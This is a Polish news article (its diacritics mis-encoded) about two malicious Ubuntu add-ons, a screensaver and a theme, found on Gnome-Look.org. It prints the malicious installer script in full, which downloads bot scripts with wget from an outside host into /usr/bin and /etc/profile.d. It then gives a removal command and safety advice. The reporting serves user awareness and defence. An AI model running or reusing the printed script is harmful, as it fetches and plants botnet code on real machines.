Z艂o艣liwy skrypt dedykowany Ubuntu
Niemal pod ka偶dym artyku艂em na temat zagro偶e艅 czyhaj膮cych na u偶ytkownik贸w Windowsa pojawiaj膮 si臋 komentarze zachwalaj膮ce odporno艣膰 Linuksa na szkodniki. Zbytnia pewno艣膰 siebie mo偶e jednak drogo kosztowa膰. W serwisie Gnome-Look.org odkryto bowiem w tym tygodniu dwa dodatki do Ubuntu zawieraj膮ce z艂o艣liwe skrypty.
Szkodliwy kod czai艂 si臋 w instalatorach wygaszacza ekranu Waterfall ScreenSaver oraz motywu Ninja Black - poinformowa艂 w serwisie Niebezpiecznik.pl konsultant ds. bezpiecze艅stwa Piotr Konieczny. Skrypt umo偶liwiaj膮cy przy艂膮czenie zaatakowanego systemu do botnetu mia艂 nast臋puj膮c膮 posta膰:
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
Z艂o艣liwe oprogramowanie najprawdopodobniej zmusza艂o zaatakowane Ubuntu do "pomocy" w przeprowadzaniu atak贸w DDoS - uwa偶a Konieczny.
Warto podkre艣li膰, 偶e podany wy偶ej kod nie wykorzystywa艂 偶adnej luki w Ubuntu. Aby dosz艂o do infekcji, u偶ytkownik podczas instalacji pakietu .deb musia艂 poda膰 has艂o roota. Jak zauwa偶a jednak Adrian Nowak prowadz膮cy serwis UbuCentrum.net, ci膮g艂e wpisywanie has艂a z czasem zwyczajnie wchodzi nam w krew i przy setnej czy tysi臋cznej pro艣bie o jego podanie naturalnym jest, 偶e nie zastanawiamy si臋 nad konsekwencjami. Dlatego m.in. warto pami臋ta膰 o pobieraniu dodatk贸w wy艂膮cznie ze sprawdzonych 藕r贸de艂.
Co zrobi膰, je艣li si臋 zainstalowa艂o kt贸ry艣 z wymienionych wcze艣niej pakiet贸w z serwisu Gnome-Look.org? Specjali艣ci doradzaj膮 wpisanie w terminalu nast臋puj膮cego polecenia:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
Uwaga! Nie nale偶y tego robi膰 "na wszelki wypadek".
殴r贸d艂o:![]() |